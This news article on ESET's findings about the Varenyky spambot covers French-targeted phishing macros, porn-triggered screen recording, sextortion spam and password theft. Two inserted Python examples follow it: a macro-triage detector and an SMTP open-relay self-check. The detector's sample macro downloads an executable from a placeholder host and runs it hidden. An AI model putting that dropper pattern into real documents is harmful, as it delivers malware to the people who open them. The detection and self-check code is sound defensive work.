
Varenyky malware records porn on screen, distributes sextortion spam

A cybercriminal operation that's been targeting France since May is attempting to distribute malware capable of recording the screens of victims who visit pornographic websites.

In other cases, the malware sends out spam emails that merely intend to trick victims into believing their web sessions were recorded while they watched porn, even though they were not. This spambot functionality has also been used to send out sketchy surveys and promotions designed to entice victims into entering their personal and credit card information.

Dubbed Varenyky, the malware can also deploy and abuse NirSoft's WebBrowserPassView and Mail PassView password recovery tools for web browsers and email clients in order to steal victims' passwords. Varenyky had previously been referenced on Twitter by the malware analysis service ANY.RUN, but last week researchers from ESET published a blog post that provided further details on the threat.

"This spambot is not very advanced, but the context and story around it make it interesting," the ESET blog post states. "Many functions have been added and then quickly removed across many different versions in a short period of time (two months). This shows that the operators are actively working on their botnet and are inclined to experiment with new features that could bring a better monetization of their work."

According to ESET, Varenyky is currently distributed in email phishing campaigns featuring Word documents embedded with malicious macros. The macros serve two functions: checking a computer's language ID to specifically target victims in France, and then downloading and executing the malware. Upon successful infection, the spambot communicates with its command-and-control server via Tor.
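The macro behaviour described above, a locale gate followed by a download-and-execute step, is the combination a triage script can look for in VBA source extracted from a suspicious document. The following is an added example written for this page; it is not ESET's or the malware's code. The indicator lists are assumptions about typical macro primitives, not signatures from the article, and both macro samples are constructed for illustration.

```python
"""Triage heuristic for extracted VBA macro source (added example).

Flags macro text that combines a language/locale check with download and
execute primitives, the pattern the article attributes to the Varenyky
droppers. Indicator lists are assumptions; the sample macros are constructed.
"""
import re
from dataclasses import dataclass, field

# Windows LCIDs for French locales (1036 = fr-FR, 2060 = fr-BE, 3084 = fr-CA,
# 4108 = fr-CH, 5132 = fr-LU).
FRENCH_LCIDS = {"1036", "2060", "3084", "4108", "5132"}

# Assumed indicators of a locale gate.
LOCALE_PATTERNS = [
    r"LanguageSettings\.LanguageID",
    r"Application\.International",
    r"GetUserDefaultLCID",
    r"GetSystemDefaultLCID",
]
# Assumed indicators of a download step.
DOWNLOAD_PATTERNS = [
    r"URLDownloadToFile",
    r"MSXML2\.(?:Server)?XMLHTTP",
    r"WinHttp\.WinHttpRequest",
    r"ADODB\.Stream",
]
# Assumed indicators of an execute step.
EXEC_PATTERNS = [
    r"\bShell\b",
    r"Win32_Process",
    r"\.Exec\b|\.Run\b",
]


@dataclass
class TriageResult:
    locale_check: bool
    french_lcid: bool
    download: bool
    execute: bool
    hits: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # A locale gate alone is common in legitimate macros; the article's
        # pattern is the gate combined with download and execute.
        return self.locale_check and self.download and self.execute


def _find(patterns, text):
    return [p for p in patterns if re.search(p, text, re.IGNORECASE)]


def triage_macro(vba: str) -> TriageResult:
    locale_hits = _find(LOCALE_PATTERNS, vba)
    download_hits = _find(DOWNLOAD_PATTERNS, vba)
    exec_hits = _find(EXEC_PATTERNS, vba)
    # Any four-digit literal in the source is checked against the French LCID set.
    lcids = set(re.findall(r"\b(\d{4})\b", vba))
    return TriageResult(
        locale_check=bool(locale_hits),
        french_lcid=bool(lcids & FRENCH_LCIDS),
        download=bool(download_hits),
        execute=bool(exec_hits),
        hits=locale_hits + download_hits + exec_hits,
    )


# Constructed sample: gates on a French UI language, then fetches and runs a file.
SAMPLE_MACRO = '''
Sub AutoOpen()
    If Application.LanguageSettings.LanguageID(msoLanguageIDUI) <> 1036 Then Exit Sub
    Set h = CreateObject("MSXML2.XMLHTTP")
    h.Open "GET", "http://example.invalid/x", False
    h.Send
    Set s = CreateObject("ADODB.Stream")
    s.Write h.responseBody
    s.SaveToFile Environ("TEMP") & "\\x.exe", 2
    Shell Environ("TEMP") & "\\x.exe", vbHide
End Sub
'''

# Constructed benign sample: a locale check used only to pick a label.
BENIGN_MACRO = '''
Sub FormatReport()
    Range("A1").Font.Bold = True
    If Application.LanguageSettings.LanguageID(msoLanguageIDUI) = 1036 Then
        Range("A1").Value = "Rapport"
    End If
End Sub
'''

if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_MACRO), ("benign", BENIGN_MACRO)):
        r = triage_macro(src)
        print(f"{name}: suspicious={r.suspicious} french_lcid={r.french_lcid} hits={r.hits}")
```

The benign macro also checks the French LCID, which is why `suspicious` requires all three components rather than the locale gate alone; in practice the hit list is what an analyst reviews, not the boolean.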

Early versions of the malware were able to scan the titles of open windows on the computer for words related to porn or bitcoin, and then send those titles to the C2 server. Varenyky's developers later enhanced this feature to record the computer screen with an FFmpeg executable whenever the malware detected the word "sexe." The malware would then upload the video to the C2 server.

"It’s unknown if these videos were recorded out of curiosity by the author(s) of the spambot or with an intention to monetize them through sextortion," the ESET blog post states. However, the researchers believe the attackers have so far "not leveraged these [videos] as far as we can tell."

The attackers behind Varenyky did launch a sextortion campaign of sorts on July 22, although it did not involve any secret recordings of pornographic content. Rather, the spambot sent out a French version of a common sextortion email seen since last year that falsely claims the victim was caught on camera viewing pornographic material. In that emailed threat, the attackers threaten to share an embarrassing video of both the victim and whatever pornographic content he was supposedly viewing with several of his contacts.

But this is just one of multiple spam campaigns launched by the attackers. Varenyky sends spam over SMTP on port 25, specifically targeting customers of the French ISP Orange S.A. "The mail servers used to relay the spam don't look like they belong to the malicious actors; they look like servers that have not been properly secured and they don't require authentication," ESET explains in its report.
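The relays ESET describes are servers that accept mail for external recipients without authentication, which is the classic open-relay misconfiguration an administrator can test for on their own server. The following is an added example for this page, not ESET's or the malware's code: it implements the standard probe (MAIL FROM an outside sender, RCPT TO an outside recipient, then RSET before any DATA, so no message is ever sent) and, so that it runs offline, starts a constructed toy SMTP server in a thread. The toy server, its two behaviours and all addresses are assumptions for illustration.

```python
"""Open-relay self-check with an in-process toy SMTP server (added example)."""
import smtplib
import socketserver
import threading


class ToySMTPHandler(socketserver.StreamRequestHandler):
    """Minimal SMTP responder (constructed). When server.open_relay is False,
    RCPT TO for a non-local domain is refused with a 554."""

    def handle(self):
        self.wfile.write(b"220 toy.example ESMTP\r\n")
        while True:
            line = self.rfile.readline()
            if not line:
                return
            cmd = line.decode("latin-1").strip()
            verb = cmd.split(" ", 1)[0].upper()
            if verb in ("HELO", "EHLO"):
                self.wfile.write(b"250 toy.example\r\n")
            elif verb == "MAIL":
                self.wfile.write(b"250 OK\r\n")
            elif verb == "RCPT":
                rcpt = cmd.split(":", 1)[1].strip().strip("<>")
                local = rcpt.lower().endswith("@" + self.server.local_domain)
                if local or self.server.open_relay:
                    self.wfile.write(b"250 OK\r\n")
                else:
                    self.wfile.write(b"554 5.7.1 Relay access denied\r\n")
            elif verb == "RSET":
                self.wfile.write(b"250 OK\r\n")
            elif verb == "QUIT":
                self.wfile.write(b"221 Bye\r\n")
                return
            else:
                self.wfile.write(b"502 Command not implemented\r\n")


class ToySMTPServer(socketserver.ThreadingTCPServer):
    allow_reuse_address = True
    daemon_threads = True

    def __init__(self, open_relay, local_domain="toy.example"):
        # Port 0 lets the OS pick a free port; read it back from server_address.
        super().__init__(("127.0.0.1", 0), ToySMTPHandler)
        self.open_relay = open_relay
        self.local_domain = local_domain


def start_toy_server(open_relay):
    srv = ToySMTPServer(open_relay)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def is_open_relay(host, port, sender="probe@sender.invalid",
                  rcpt="probe@recipient.invalid", timeout=5):
    """Return True if the server accepts an external sender to an external
    recipient with no authentication. The transaction is reset with RSET and
    never reaches DATA, so nothing is delivered."""
    with smtplib.SMTP(host, port, timeout=timeout) as s:
        s.ehlo_or_helo_if_needed()
        code, _ = s.mail(sender)
        if code != 250:
            return False
        code, _ = s.rcpt(rcpt)
        s.rset()
        return code == 250


if __name__ == "__main__":
    for mode in (True, False):
        srv = start_toy_server(open_relay=mode)
        host, port = srv.server_address
        print(f"server open_relay={mode}: probe result={is_open_relay(host, port)}")
        srv.shutdown()
        srv.server_close()
```

Against a real server the same `is_open_relay` call applies, with the host and port of the server you administer; a correctly configured relay answers the external RCPT with a 5xx unless the session has authenticated, which is the behaviour the "closed" toy server models.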

Spam messages are typically designed to persuade recipients into clicking a link or opening an attachment. In some cases, this led spam recipients to a scam survey and promotion that encourages them to enter their personal information and credit card data. Those who do may later find that they are being charged monthly fees they never signed up for.

Varenyky's developers continue to evolve their product, most recently adding a malicious command for creating hidden desktops on computers. "The malware can be directed to start various applications that have a graphical interface, such as web browsers and the Windows Run dialog on this invisible desktop," ESET reports. "It has the ability to accomplish various tasks, such as navigating menus, reading text, taking screenshots, clicking on the screen and also minimizing, restoring and maximizing windows."

Bradley Barth

As director of multimedia content strategy at CyberRisk Alliance, Bradley Barth develops content for online conferences, webcasts, podcasts and video/multimedia projects — often serving as moderator or host. For nearly six years, he wrote and reported for SC Media as deputy editor and, before that, senior reporter. He was previously a program executive with the tech-focused PR firm Voxus. Past journalistic experience includes stints as business editor at Executive Technology, a staff writer at New York Sportscene and a freelance journalist covering travel and entertainment. In his spare time, Bradley also writes screenplays.
